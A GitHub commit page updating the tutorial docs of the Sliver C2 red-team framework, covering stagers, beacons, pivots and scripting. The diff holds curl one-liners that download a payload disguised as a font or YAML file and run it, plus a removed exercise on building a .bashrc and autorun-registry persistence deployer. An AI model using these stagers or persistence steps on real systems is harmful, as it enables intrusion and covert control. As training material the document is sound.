Skip to content

Commit

Permalink
update tutorial text and add 1.6 disclaimer
Browse files Browse the repository at this point in the history
  • Loading branch information
@TimBF
TimBF committed Jul 22, 2024
1 parent 36e0c71 commit eed6890
Show file tree
Hide file tree
Showing 8 changed files with 140 additions and 92 deletions.
54 changes: 0 additions & 54 deletions docs/sliver-docs/nohup.out
View file

This file was deleted.

4 changes: 2 additions & 2 deletions docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
This course will use the latest Sliver build, you can download it from [insert local web server].
# This course is intented for the 1.6 version of Sliver, which is not yet published

`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.

Expand Down Expand Up @@ -85,4 +85,4 @@ Running an interactive shell

```asciinema
{"src": "/asciinema/shell.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8}
```
```
4 changes: 0 additions & 4 deletions docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# Beacons vs Sessions

Sliver implants support two types of connections, sessions and beacons.

Sessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.
Expand Down Expand Up @@ -66,8 +64,6 @@ Commands issued for beacons can be viewed using `tasks`, the task state will ind
{"src": "/asciinema/beacon_tasks.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8}
```

beacon_tasks.cast

Session can be spun up using the `interractive` command.

```asciinema
Expand Down
6 changes: 2 additions & 4 deletions docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# Stagers

When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.

For this exercise we will create a new beacon profile and prepare to stage it.
Expand All @@ -18,7 +16,7 @@ There is a lot of flexibility in the form of this URL, the conditions for succes
* There has to be a one character http url parameter
* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values

To expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.
To expose a payload you need to use the `implants stage` command and specifically select the implant to leave accessible.

```asciinema
{"src": "/asciinema/stage_implant.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8}
Expand All @@ -45,4 +43,4 @@ curl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && c
Or on Windows:
```
curl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\t.exe
```
```
2 changes: 0 additions & 2 deletions docs/sliver-docs/pages/tutorials/md/5 - Pivots.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# Pivots

Pivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.

Sliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.
Expand Down
27 changes: 2 additions & 25 deletions docs/sliver-docs/pages/tutorials/md/6 - Scripting.md
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
## Sliver Reactions

Reactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.

```bash
Expand Down Expand Up @@ -49,7 +47,7 @@ You can remove reactions using `reaction unset`.

However, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running.

Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.
Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript for example to connect to the server over gRPC, which we’ll cover next.

## Sliver-py

Expand All @@ -74,16 +72,10 @@ Since our extension is essentially going to be another client connection to the
[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg
```

We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:

```html
pip3 install ipython3
```

We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell.
We first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.

```bash
tester@test ~/t/sliver> ipython3
Python 3.9.16 (main, Dec 7 2022, 10:06:04)
Type 'copyright', 'credits' or 'license' for more information
IPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.
Expand Down Expand Up @@ -224,18 +216,3 @@ b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS fil
Automatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2
b'##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting. Do not change this entry.\n##\n127.0.0.1...
```
As an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.
Here are a couple hints:
- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc
- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload("/home/target/.bashrc", contents + b'\r\necho "pwned !"')`.
- For Windows you can look at the `registry_read` and `registry_create_key` functions.
## References
- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)
- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)
- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)
- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)
Loading

0 comments on commit eed6890

Please sign in to comment.